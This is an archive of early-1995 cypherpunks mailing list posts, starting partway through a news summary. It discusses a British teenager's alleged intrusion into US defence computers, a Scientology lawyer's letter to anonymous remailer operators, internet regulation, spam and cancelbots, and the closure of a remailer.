A British hacker who read the messages told the Independent they contained information about firing sites in North Korea and field intelligence. "He kept detailed logs of communication traffic. He really couldn't believe his luck. The Americans thought he was a spy but he told them he was just doing it for fun," the hacker told the Independent. The boy, nicknamed "Datastream" by other Internet users, was finally caught by special U.S. investigators because he left his terminal on-line to a U.S. defense computer overnight. British police arrested the boy in July and prosecutors are expected to decide this month whether he can be charged, the Independent said. In a statement to the paper, the U.S. Air Force Office of Special Investigations acknowledged the hacker could have accessed and read the Korean files. From nsb at nsb.fv.com Wed Jan 4 06:45:31 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 4 Jan 95 06:45:31 PST Subject: San Francisco Editorial In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com> Message-ID: A letter to the editor is like spitting into the wind in this case. I think what's needed is a more constructive affirmative action, ideally taking Cantor and Siegel to court somewhere. I know that there was an FCC ruling in 1993 that has saved me LOADS of annoyance from telephone sales calls, because now if you get such a call and you formally request to be taken off their dialing lists, you can actually SUE them if they call you again. As a result, they now tend to take you very seriously when you make such a request in a knowledgable fashion. Does anyone know if there might be a similar legal case to be made against net spammers who persist after being warned? I suspect that it's easy to make such a case for email spamming, but probably not for spamming of umoderated newsgroups. Note that I speak entirely for myself here, not for my employers. 
-- Nathaniel From dan at chopin.udel.edu Wed Jan 4 06:59:35 1995 From: dan at chopin.udel.edu (The Dalai Lama) Date: Wed, 4 Jan 95 06:59:35 PST Subject: Anonymous payment scheme In-Reply-To: <9501040637.AA11348@anchor.ho.att.com> Message-ID: I know that in Delaware it is illegal for a merchant to request ID when you pay by credit card. I'm not sure if this is wide spread or just local. -- [Here's something for those friendly mail scanners...] hack phreak crack assassinate president virus espionage clinton honduras root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche > The standard merchant contract with Visa/Mastercharge used to forbid > merchants from asking for additional ID unless they suspected fraud; > I think some states have made laws about this as well. > > Bill > From frissell at panix.com Wed Jan 4 07:14:10 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 4 Jan 95 07:14:10 PST Subject: Regulatory Risks Message-ID: <199501041514.AA02778@panix.com> So if the feds intend to regulate cyberspace, what specific sorts of regulations are possible at this point? Forget laws, what is *technically* and institutionally feasible? Can they just throw out TCP/IP and mandate X25? Can TCP/IP be "tamed?" How can they control private virtual networks that piggyback on the basic network structure? Just questions. No answers. DCF ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From nobody at replay.com Wed Jan 4 08:00:03 1995 From: nobody at replay.com (Name withheld on request) Date: Wed, 4 Jan 95 08:00:03 PST Subject: Warning letter from Co$. [any comments ?] Message-ID: <199501041600.AA07488@xs1.xs4all.nl> January 3, 1995 TO: INTERNET REMAILER OPERATORS FROM: THOMAS M. 
SMALL COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE PUBLICATIONS, INC. I represent Religious Technology Center ("RTC"), which owns the unpublished, confidential Advanced Technology of the religion of Scientology, and holds exclusive rights under the copyrights applicable to the Advanced Technology materials. I also represent Bridge Publications, Inc., which holds the exclusive right to print, publish and sell various non-confidential works by the founder of the Scientology religion, L. Ron Hubbard, and to make and publish compilations and derivative works of and from those works and to enforce all rights in them. It has come to my attention that there are two alternate newsgroups on the Internet to which individuals have been annonymously posting certain of my clients' published and unpublished copyrighted materials, including certain of the confidential Advanced Technology materials. These confidential materials being posted were stolen from my client. There is reason to believe that the materials which are uploaded by these users may also be downloaded by other users, and that these activities may be occurring through the systems which are linked into the Internet. The two newsgroups into which these materials are being copied are alt.technology.clearing and alt.religion. Scientology. We request your assistance in dealing with the problem. The spread of infringements and misappropriations by the users will be lessened if you lock out from your systems the two newsgroups involved, alt.religion.scientology and alt.technology.clearing, limiting the potential for reposting and downloading. It will then be easier to deal with the intentional infringers through appropriate channels. Both the uploading and downloading of these materials constitute unauthorized copying and distribution of the materials in violation of our clients' rights under United States copyright laws and the law of other countries, where applicable. 
Damages and an injunction against further unauthorized copying and distribution may be obtained against infringers and, all unauthorized copies and all materials and equipment by which the unauthorized copies may be reproduced can be impounded. Unauthorized disclosure of the confidential Advanced Technology materials also violates applicable trade secrets laws.

Action is being taken directly with the systems users who we know are primarily responsible for these violations of my clients' rights. We hope those actions will put an end to the infringements by these users. We do {not} wish to involve others in litigation. Unfortunately, however, such actions will be unavoidable where there is contributory infringement by those who knowingly induce or contribute to the infringing conduct of these users by providing facilities or systems that enable the direct infringers to infringe, because we legally must take all actions to protect our clients' property rights. Courts are holding such contributory infringers liable. Two examples are: Sega Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. 1152 (M.D. Fla. 1993).

Recent proposed legislation regarding potential liability of systems operators and others who provide facilities or services, such as annonymous remailers, for information passing through their systems has understandably created concern on the part of systems operators as a potential liability. We ask your voluntary assistance in dealing with these known wilful infringers so that we can both deal with the problem without legal hassles, and legal liability can be confined to those who intend to create the situation.

We ask that you confirm that you have blocked access to these newsgroups through your remailer. If you are unwilling to do so, we ask that you inform us as to the reasons for your position.

Sincerely,

Thomas M.
Small

From bmorris at netcom.com Wed Jan 4 08:52:49 1995
From: bmorris at netcom.com (Bob MorrisG)
Date: Wed, 4 Jan 95 08:52:49 PST
Subject: Anonymous payment scheme
In-Reply-To:
Message-ID: <199501041652.IAA22982@netcom7.netcom.com>

BL> I don't see why a debit card couldn't be anonymous
BL> Why should a bank care who you are once they have
BL> your money in the account.

The bank might not care. The IRS probably does and would insist on knowing about transfers from bank accounts to anon debit cards.

BL> you don't lose the card how can someone use your account?

Just like with real cash. Possession is ownership. Digital cash involves crypto and, I assume, some type of personal ID?

From pcw at access.digex.net Wed Jan 4 09:30:06 1995
From: pcw at access.digex.net (Peter Wayner)
Date: Wed, 4 Jan 95 09:30:06 PST
Subject: Siegel and Lewis
Message-ID: <199501041728.AA27110@access2.digex.net>

>
>Peter also did little to interview anyone with substantial standing in
>the internet community about what C&S were doing -- a quote or two
>from an old net hand like a Gene Spafford or someone of that ilk might
>have been valuable. As it was, he didn't produce much to counter the
>viewpoint that they were the victims rather than the victimizers.

Geez, thanks. He quoted me in an article on the C&S problem long ago. I had a legitimate beef because my service provider dutifully kept many empty newsgroups around just in case someone discovered them. C&S did and I literally spent 2 hours unsubscribing from all of them. I seem to remember that he quoted me as being really inconvenienced, which is pretty much what happened to everyone else.

>
>I think it is only because the "paper of record" published articles
>that made them look like their point of view had any merit at all that
>they managed to survive this long. As it is, the Tennessee Bar is
>looking in to whether they have committed any new ethical
>violations. I'd say, of course, that they had...
You are correct, though, about this. They seem to draw much more unsuspicious attention than a pair of disbarred attorneys should get. Of course, all attorneys deserve caution and suspicion.

>
>Perry

From rah at shipwright.com Wed Jan 4 09:50:48 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 4 Jan 95 09:50:48 PST
Subject: Warning letter from Co$. [any comments ?]
Message-ID:

At 5:00 PM 1/4/95, Name withheld on request wrote:

This may be interesting. Practically the entire revenue stream for the "Church" of "Scientology" comes from "sales" of this "literature". If someone publishes it on the internet anonymously, the revenue accounts of the Co$ may become "Clear". Ahem.

Meanwhile, theology and philosophy departments everywhere are fighting for funding to put most of the legitimate canon in their fields on the net for free...

> Thomas M. Small
            ^^^^^

Cheers,
Bob R. Nott
      ^^^^

-----------------
Robert Hettinga (rah at shipwright.com)    "There is no difference between someone
Shipwright Development Corporation      who eats too little and sees Heaven and
44 Farquhar Street                      someone who drinks too much and sees
Boston, MA 02331 USA                    snakes." -- Bertrand Russell
(617) 323-7923

From frissell at panix.com Wed Jan 4 10:36:29 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 4 Jan 95 10:36:29 PST
Subject: British Hacker Article
Message-ID: <199501041831.AA22005@panix.com>

From The Independent (London) Tuesday 3 January 1995 - Front Page
[Banner Headlines]

BRITISH BOY `RAIDED US DEFENCE SECRETS'

by Tim Kelsey

A 16-year-old Briton allegedly hacked into some of the US government's most sensitive computers and was able to watch secret communications between US agents in north Korea during the crisis over nuclear inspection last spring. After reading them, he put them onto a bulletin board of the Internet, an international computer network accessible by 35 million users.
_The_Independent_ has learnt that Scotland Yard has arrested the boy and has sent a report to the Crown Prosecution Service. Officers expect to be told whether he can be charged this month.

In what US officials have conceded is one of the most serious breaches of computer security in recent years, the boy accessed several defence department systems for at least seven months without detection. The systems he obtained access to included those for ballistic weapons research, and aircraft design, payroll, procurement, personnel records and electronic mail.

The boy, who was arrested in Tottenham, north London in July, was, according to US officials, one of a number of people who broke into US defence computers in the latter months of 1993 and the early months of 1994. But it is understood that he was responsible for most of the damage. In all, more than a million user passwords were compromised. The US Defence Information Systems Agency admitted in a private briefing, which has been confirmed, that the hackers had affected the Department's "military readiness."

The boy was first detected in March 1994, and the Air Force Office of Special Investigations (OSI) was appointed to investigate. The OSI is a special task force, based at Bolling Air Force Base in Washington DC. It mounts special "raids" on classified computer sites to test their security.

A spokesman said yesterday that the boy, who was nicknamed "Datastream" by friends on the Internet, needed "more knowledge than the average home computer owner would possess" to hack the computers. It is understood that he invented a "sniffer" programme which searched across hundreds of computers attached to the Internet for passwords and user names. He was finally caught because he left his terminal on-line to a US defence computer over night.

Another British hacker, aged 22, who is acquainted with "Datastream", read some of the messages accessed by him.
"They contained information about firing sites in North Korea and stuff like that. Field intelligence. He kept detailed logs of communication traffic. He really couldn't believe his luck. The Americans thought he was a spy but he told them he was just doing it for fun."

The OSI said in a statement: "It is unknown if any hacker actually read, copied or took any other action with the Korean files or any other sensitive data. The Korean files were on the Girths Air Force Base computer system and therefore they could have been accessed. It is our opinion that the hacker who accessed the Korean file system learned of its existence from a bulletin board system or another hacker. It is possible the hacker could have read the Korean files."

Scotland Yard's Computer Crime Unit is able to prosecute the boy under the terms of the Computer Misuse Act, which allows for crimes committed overseas by Britons to be dealt with in UK courts. A spokesman confirmed that a report had been sent to the CPS.

The Internet, designed in the 1960s by US Defence engineers to enable them to communicate quickly by computer, is now available to anyone who pays a small fee.

---
Keyboarding by Lois Roth

*************************************************************************
ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail.

From jamesd at netcom.com Wed Jan 4 10:38:47 1995
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 4 Jan 95 10:38:47 PST
Subject: Press attack on anonymity.
In-Reply-To: <9501032146.AA19980@argosy.MasPar.COM>
Message-ID:

On Tue, 3 Jan 1995, David G. Koontz wrote:
> The question is who launched all this stuff?
When the government -- or some rogue government department wishing to expand its role and authority -- wishes to launch a new, and possibly unpopular, act of coercion, they normally find some interest group that might be advantaged by that act of coercion, and boost them up.

Assume the objective is to make the famous information superhighway into an imitation of Plodigy and existing media -- in other words ensure that it is dominated by few to many communications, and that many to many communications are censored.

The obvious interest group is those who wish to advertise on the internet as if it was a normal few to many medium.

This assumption makes predictions consistent with what we observe.

I am not unduly worried. Canter and Siegel is not a significant interest group. Furthermore the Republican party is at present in favor of many to many communications because talk radio was a big factor in their victory, and the internet was a major factor in the defeat of Foley.

This is just a small time conspiracy by some ignorant rogue government department, perhaps the NSA, that does not realize what they are confronting.

When the internet starts to have a serious impact on government revenues, then I am going to worry.

In addition, many to many communications work primarily against the Democrats primarily because they are so entrenched in power. When the Republican party has been in power a while, they will no longer be so keen on many to many communication.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.
jamesd at netcom.com

From unicorn at access.digex.net Wed Jan 4 10:55:56 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Wed, 4 Jan 95 10:55:56 PST
Subject: Siegel and Lewis
In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com>
Message-ID:

On Wed, 4 Jan 1995, Doug Barnes wrote:

> Date: Wed, 4 Jan 1995 07:42:57 -0600 (CST)
> From: Doug Barnes
> To: Raph Levien
> Cc: cypherpunks at toad.com
> Subject: Re: Siegel and Lewis
>
> > Why is it that so many cypherpunks like the economist?
>
> I learned recently that Eric is a big fan. So am I. You're certainly
> not the first other cypherpunk to mention this. Weird. I mean, it's
> not exactly a radical publication... it just gets its *&#$*#$ facts
> right.

Probably this is it. I am also a fan. I tend to focus on the subject matter economist prints. I just find it more on target than most if not all of the major U.S. media sources.

>
> Doug
>

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From jamesd at netcom.com Wed Jan 4 11:06:45 1995
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 4 Jan 95 11:06:45 PST
Subject: Regulatory Risks
In-Reply-To: <199501041514.AA02778@panix.com>
Message-ID:

On Wed, 4 Jan 1995, Duncan Frissell wrote:

> So if the feds intend to regulate cyberspace, what specific sorts of
> regulations are possible at this point?
>
> Forget laws, what is *technically* and institutionally feasible?

Criminalize anonymity, and tell the internet providers to figure out how to enforce it or face confiscation.

After that, they can get involved in the standards business to ensure that when the current 32 bit internet address space is upgraded, we go with a system where the technology supports centralized administration rather than anarchy.

They can do it -- but they probably will not. Recent political events mean that such actions can only be done on presidential authority.
It will be impossible to obtain new law to enforce such measures for at least four years.

There will be eventually a big confrontation between governments and liberty in cyberspace -- but I doubt that this is it. This one can be won with a few letters to the editor.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From jim at rand.org Wed Jan 4 11:08:49 1995
From: jim at rand.org (Jim Gillogly)
Date: Wed, 4 Jan 95 11:08:49 PST
Subject: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <199501041907.LAA06127@mycroft.rand.org>

> nobody at replay.com (Name withheld on request) writes:
> FROM: THOMAS M. SMALL
> COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
> PUBLICATIONS, INC.

While the issue is interesting (using anonymous mailers to violate copyrights or to expose scams, depending on your view of the content), the apparent aim of the Scientologists isn't met by approaching the cypherpunk remailers: the specific anonymous postings have been through penet so far, I think.

> Recent proposed legislation regarding potential
> liability of systems operators and others who provide
> facilities or services, such as annonymous remailers, for
> information passing through their systems has understandably
> created concern on the part of systems operators as a
> potential liability. We ask your voluntary assistance in

You missplet "anonymous". Hope this helps.

The only "proposed legislation" I know of was proposed by Martha Siegel, the greencard guru from CyberHell. Any others?

> We ask that you confirm that you have blocked access to
> these newsgroups through your remailer. If you are unwilling
> to do so, we ask that you inform us as to the reasons for
> your position.
Yeah, right. People unclear on the concept of anonymous remailers. Maybe they should be talking to the mail-to-news forwarders instead.

Jim Gillogly
Highday, 13 Afteryule S.R. 1995, 19:06

From jamesd at netcom.com Wed Jan 4 11:13:46 1995
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 4 Jan 95 11:13:46 PST
Subject: Anonymity and talk.politics.chinal
Message-ID:

Many of the messages in talk.politics.china are anonymous. They use anon.penet.fi

Many of these messages are in Chinese, not ASCII.

This is an obvious example of legitimate use of anonymity. In addition this example makes an association in people's minds between suppressing anonymity, and discouraging dissent.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From quester at eskimo.com Wed Jan 4 11:38:33 1995
From: quester at eskimo.com (Charles Bell)
Date: Wed, 4 Jan 95 11:38:33 PST
Subject: San Francisco Editorial
In-Reply-To:
Message-ID:

"A letter to the editor is like spitting into the wind", you say. Well, yeah...but with enough spit, the wind may change. So everyone should write letters to the editor....and make copies for your congressman while you're at it. This is absolutely the most effective action you can take for 64 cents.

From wcs at anchor.ho.att.com Wed Jan 4 11:41:13 1995
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 4 Jan 95 11:41:13 PST
Subject: Regulatory Risks
Message-ID: <9501041905.AA17682@anchor.ho.att.com>

Duncan asks
> So if the feds intend to regulate cyberspace, what specific sorts of
> regulations are possible at this point?
> Forget laws, what is *technically* and institutionally feasible?
> Can they just throw out TCP/IP and mandate X25? Can TCP/IP be "tamed?"
> How can they control private virtual networks that piggyback on the basic
> network structure?

"Our chief weapon was surprise", and of course Fear, Uncertainty, and Doubt.

The most effective thing they could do would be to deploy a digital signature system that you _have_ to use to pay your company taxes or file your individual tax returns on-line, and go from there to requiring it for other business transactions with the government. Subsidized servers, of course. It's worked with Social Security Numbers, and if they control on-line signatures for business, then they can control access to the nets for a large fraction of the population. Along with it, require that banks use the signatures for electronic banking, which is a bit easier since banks are heavily regulated and the Federal Reserve would probably be happy to help. Besides, it gives the Post Office something to do in a post-paper world.

They obviously can't prevent piggyback networks, but they _can_ make it economically infeasible for medium-large companies to run them. For instance, declaring internet providers to be common carriers, and doing a "digital telephony bill" to require them to use IPng authentication on packets and traceable headers on news and email systems, with the risk of de-licensing and confiscation for non-conformists. It's nice that the largest backbone provider is now NOT the NSFnet, but a commercial provider (though I'd obviously prefer AT&T to Sprint+MCI :-), but they're still the Phone Company, and could be forced to accept regulation.

Meanwhile, at the user end, the Enemy could start using confiscation on any computers caught running remailers or encryption - even if they can't stop us Nasty Evil Black-Marketeering K0deZ Dealers, they could make it too risky to do at work or school, which means your own money is on the line if you get caught calculating in the Black Numbers.
I doubt they'll be able to ban convicted lawbreakers from using computers entirely for much longer (heck, I wouldn't be able to use my microwave oven any more, much less drive my car), but they could still try.

Bill

From avi at clas.ufl.edu Wed Jan 4 12:46:33 1995
From: avi at clas.ufl.edu (Avi Harris Baumstein)
Date: Wed, 4 Jan 95 12:46:33 PST
Subject: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <199501042047.PAA06797@cutter.clas.ufl.edu>

nobody writes a very nice, non-confrontational and well thought out letter supporting his case (and ignoring the oddness of copyrighting religious materials). but i have some questions that weren't discussed when i took business law 101 a few years ago:

nobody at replay.com (Name withheld on request) writes:

> applicable. Damages and an injunction against further
> unauthorized copying and distribution may be obtained against
> infringers and, all unauthorized copies and all materials and
> equipment by which the unauthorized copies may be reproduced
> can be impounded. Unauthorized disclosure of the
> confidential Advanced Technology materials also violates
> applicable trade secrets laws.

i know there has been much chatter on this subject, but are there truly any precedents that could hold on the anonymous distribution of copyrighted material? are remailer-ops truly in legal danger?

what exactly constitutes a trade secret, and what sort of laws apply?

> clients' property rights. Courts are holding such
> contributory infringers liable. Two examples are: Sega
> Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D.
> Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp.
> 1152 (M.D. Fla. 1993).

what of these cases? is this just an example of typical lawyerly intimidation tactics?

how do you remailer-ops plan to react? my first instinct (were i running a remailer) would be to ignore it, on grounds that i wouldn't examine any mail passing through.
but if there really were valid precedent in this matter... (has anyone seen any well-written lay-person evaluations of the steve jackson case? i read the ruling, but much of it went in one eye and out the other).

i think the censorship thing is building steam, and we should start preparing (and informing) ourselves...

-avi

From danisch at ira.uka.de Wed Jan 4 13:02:33 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Wed, 4 Jan 95 13:02:33 PST
Subject: Warning letter from Co$. [any comments ?]
Message-ID: <9501042102.AA22721@elysion.iaks.ira.uka.de>

> These confidential materials being posted were stolen from
> my client. There is reason to believe that the materials
> which are uploaded by these users may also be downloaded by
> other users,

What makes him think that anyone (except thetans which spend all their money to scientology anyway) wants to have this "material" and wastes any diskspace or bandwidth for ?

Hadmut

From anonymous-remailer at shell.portal.com Wed Jan 4 13:10:13 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 4 Jan 95 13:10:13 PST
Subject: who?
Message-ID: <199501042110.NAA27459@jobe.shell.portal.com>

does anybody know what the email address is for the good samaritans? tia

ps, how come mail i send to jpiunix.com is getting bounced, are they down?

From nesta at nesta.pr.mcs.net Wed Jan 4 13:22:59 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Wed, 4 Jan 95 13:22:59 PST
Subject: regards to legal attempt to stifle remailers
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID:

After reading the post from the Scientologists about locking out groups from anon-remailers, I was thinking a little bit, note I said a little bit this isn't a fully fleshed out idea yet.
I was thinking it may be smart for some of the remailers to lock out the groups, in particular those operators who do it from a student account, or perhaps from their own account in the United States where legal action would be able to reach them. But to get around this, the anon users can use the Finland server, or a new and improved anon-remailer.

By shopping around for ISPs it is possible to find a provider who takes payment thru mail and doesn't require positive ID to set up an account. With this you then either run that account as the remailer, a totally anon account not linked to your person and thus immune from legal actions (besides having it closed by the ISP if they are pressured) or you can run a SLIP connection and run a remailer much like Julf's on your own machine thru a dedicated SLIP line.

i want to know everything               http://www.mcs.com/~nesta/home.html
i want to be everywhere                 Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters     /-/ a s t e zine

From jrochkin at cs.oberlin.edu Wed Jan 4 13:45:21 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 13:45:21 PST
Subject: San Francisco Editorial
Message-ID:

At 5:44 PM 01/03/95, Hal wrote:
>The scary thing about cancels is that some proposals have actually been
>directed at anonymous posts themselves. Someone anonymously posted
>what purported to be a grisly transcript of the last seconds of the
>doomed Challenger crew as they fell to the ocean. This caused a great
>hue and cry and some calls for banning anonymous posts and/or
>retroactively cancelling them. This led to some very amusing events
>which Detweiler has chronicled in his FAQ on anonymity, the net result
>of which was that the idea was discredited. But the emergence of
>CancelMoose is not an altogether positive event in my view.

I too have mixed feelings about CancelMoose. But it must be noted, that while it's possible for CancelMoose to be used for Evil Purposes, it hasn't.
This isn't a trivial point. The net collectively (well, it wasn't really collective, but I suggest if this individual anonymous CancelMoose hadn't existed, someone else would have done it) responded to something that it's nearly universally agreed upon is bad; C&S-style spamming. That is an example of an anarchist non-hierarchical system _working_, despite the lack of rules. And the widespread cancelling of anonymous posts, or posts from communists or whatever, _hasn't_ happened. And if someone tried it, I bet it wouldn't work for long, something would be done to stop it. An anti-cancelbot that reposts anything cancelled by the Evil Censoring Cancelbots, or something. (Why haven't C&S thought of this themselves? Would really create havoc with all the cancels and anti-cancels and re-cancels, etc.)

I don't think Martha Siegel really understands what's going on (not a surprise). She is speaking out against a lawless anarchist net, and saying we need more rules. Because she's mad at people cancelling her posts, mainly. But it seems completely obvious that if we _did_ have rules, they would prohibit the kind of really horrible spams she and her husband have undertaken. Because 99.99% of the net agrees that those spams are really bad. But, like I said, such rules aren't even necessary. The net collectively reacts. And there will be a counter reaction, C&S will figure out how to get around the cancelbots, or the cancelbots will be used for Evil, or whatever. But I believe firmly that that would cause yet another counter reaction of some kind. And so on and so on. The net will stay at equilibrium.

From erc at s116.slcslip.indirect.com Wed Jan 4 13:45:48 1995
From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Wed, 4 Jan 95 13:45:48 PST
Subject: warning letter from...
Message-ID:

Speaking of Scientology...

Forwarded message:
> Newsgroups: rec.humor.funny
> Subject: Do we face Mount St. Helens twice a day?
> From: wb8foz at netcom.com (David Lesher)
> Keywords: topical, funny, parody, computers
> Approved: funny at clarinet.com
> Message-ID:
> Date: Wed, 4 Jan 95 12:20:02 EST
>
> AP: BILL TAKES ON ORAL & JIM
>
> Bill Gates, Incorporated announced that the Corporation has
> purchased a controlling interest in the Church of Scientology,
> effective today. The amount of the transaction was not
> disclosed.
>
> A corporate spokesman reading from a prepared text called
> "premature" reports that the next version of the company's
> mainstay product, referred to as "Windows_2001" in the trade
> press, will incorporate an E-meter pop-up box.
>
> The spokesman did vehemently deny that BGI had really intended
> to purchase the Roman Catholic Church, but had drafted the
> contract with Microsoft Word on a Pentium, thus causing the
> error.
>
> "We got what we wanted. We see a great potential in the
> Church's auditing techniques, and plan to use them to
> investigate methods of producing more uniform structured
> thoughts, err, code."
>
> BGI is privately held.
> RCC stock closed down 1/8, in light trading.

--
Ed Carp, N7EKG    Ed.Carp at linux.org, ecarp at netcom.com
801/534-8857 voicemail    801/460-1883 digital pager
Finger ecarp at netcom.com for PGP 2.5 public key    an88744 at anon.penet.fi
** PGP encrypted email preferred! **
"What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning"

From jrochkin at cs.oberlin.edu Wed Jan 4 13:46:49 1995
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 13:46:49 PST
Subject: Siegel and Lewis
Message-ID:

At 7:22 PM 01/03/95, Raph Levien wrote:
> His piece that ran Saturday was badly mangled by the editorial
>process, especially since it ran on page one. Those articles get to be
>mangled by a whole new set of people who otherwise wouldn't get to
>touch it. I think Lewis has basically good intentions, and does do his
>homework before writing a story.
Yeah, I encourage everyone to actually _finish_ reading that article before putting Lewis on your permanent hate list. I almost put it down in disgust, from the stuff on page 1, but if you turn to where the article is continued, it becomes quite a bit more balanced and less fear-mongering.

In a rather disjointed sort of way, that makes it easy to believe the article was mangled somewhat in editing. Perhaps they rearranged it to put the "sensational" fear-mongering stuff first. Which is unfortunate, and perhaps intentional, because most people probably won't make it to the end of the article, and if they do, will have been pre-biased by the initial paragraphs, especially if this is the first they've heard of the subject. But I don't have too much trouble believing that all blame belongs on the editors, and not Lewis. :)

From wulkwa at near.net Wed Jan 4 13:47:22 1995
From: wulkwa at near.net (wulkwa at near.net)
Date: Wed, 4 Jan 95 13:47:22 PST
Subject: Regulatory Risks
Message-ID: <199501042146.QAA08343@nova.umd.edu>

I think it's important to realize that organizations move on a slower time scale than people. The larger the organization, the longer the time scale. Thus, when looking at the government's response to anonymous transactions it would be wise to look at trends dating back to the '70s (if not earlier).

Also, it's important to realize that such long-term activities are systemic in nature. Examples of government attacks on anonymous activities might include the war on drugs (especially the money laundering countermeasures).

W.

From koontz at MasPar.COM Wed Jan 4 13:59:06 1995
From: koontz at MasPar.COM (David G. Koontz)
Date: Wed, 4 Jan 95 13:59:06 PST
Subject: Warning letter from Co$. [any comments ?]
Message-ID: <9501042201.AA29419@argosy.MasPar.COM>

Other than the obvious, that electronic media hasn't been shown to be covered by intellectual property, and that something that has been placed in the public domain, rightly or wrongly isn't confidential ...
Is this a hoax?

From adwestro at ouray.Denver.Colorado.EDU Wed Jan 4 14:05:43 1995
From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Wed, 4 Jan 95 14:05:43 PST
Subject: who?
In-Reply-To: <199501042110.NAA27459@jobe.shell.portal.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 4 Jan 1995 13:10:45 -0800, anonymous-remailer at shell.portal.com wrote:

> ps, how come mail i send to jpiunix.com is getting bounced, are they down?

Regrettably, it appears jpunix.com is down permanently. I can't fault John at all, and want to thank him for running a robust remailer for as long as he was able. I captured this earlier today:

=============================================================================
From: perry at jpunix.com (John A. Perry)
Newsgroups: alt.privacy.anon-server,alt.anonymous
Subject: Re: Jpunix "unknown"?
Date: 4 Jan 1995 06:55:22 -0600
Organization: J. P. and Associates

In article , Don Doumakes wrote:
>I've gotten several pieces of mail returned from jpunix. Is it down
>permanently, or is this just a temporary problem?

Here is the test of a message I sent to remailer-operators:

The anonymous remailer at jpunix.com is going to shut down permanently shortly after I send this message. I spent my holidays fighting spams, running out of disk space because of spams and people sending HUGE binaries, and running out of swap space. I have come to the ultimate conclusion that the Internet is not mature or developed enough for remailers. The intended purpose has been completely ignored while abuse is growing almost geometrically on a daily basis.

I have concluded that running a remailer on the Internet is like giving a bunch of terrorists a nuclear bomb and then telling them "But only use it for good!". There just doesn't seem to be much point in thrashing my disks and computer to aid somebody in net abuse. I hardly ever (never) see any use of the remailer for the purposes it was intended.
BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 30 seconds. The contents of the spam being passed thru my system essentially says:

THIS IS A MAIL BOMB!! **** BOOM ***
=============================================================================

Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwsa7VRRFMq4NZY5AQEC7QP/SsfagBISP7k+0en0MeJpTPD56BNv0xGX
Fh80FuzJ/8Ya7Z4ykz8C1zTtXUaKJeIMgGbQkwybYveOGY5eZWgkc62r+FjmW6fh
JY2WhI7e0w+NpfjLBktr+deBvy3b9ElXfbiObfftZMZX/yVke7KX7p7hhdK8t7/g
vVj+TqEMhGU=
=GnaX
-----END PGP SIGNATURE-----

From elkinsd at teleport.com Wed Jan 4 14:10:47 1995
From: elkinsd at teleport.com (Enki of Enridu)
Date: Wed, 4 Jan 95 14:10:47 PST
Subject: Stegno for Kids
In-Reply-To:
Message-ID:

On Tue, 3 Jan 1995, Robert A. Hayden wrote:

> On Tue, 3 Jan 1995, Hadmut Danisch wrote:
> There was also this thing where you would get these books and a magic
> marker, and then you would do puzzles in the book, and use the pen to
> develop the answer.
>
> The old Infocom hint books also used a similar setup.

I remember those. The hints would range in order of how desperate the player was. That was almost as much fun as the game...

David Elkins

From blancw at microsoft.com Wed Jan 4 14:42:04 1995
From: blancw at microsoft.com (Blanc Weber)
Date: Wed, 4 Jan 95 14:42:04 PST
Subject: Siegel and Lewis
Message-ID: <9501042243.AA25793@netmail2.microsoft.com>

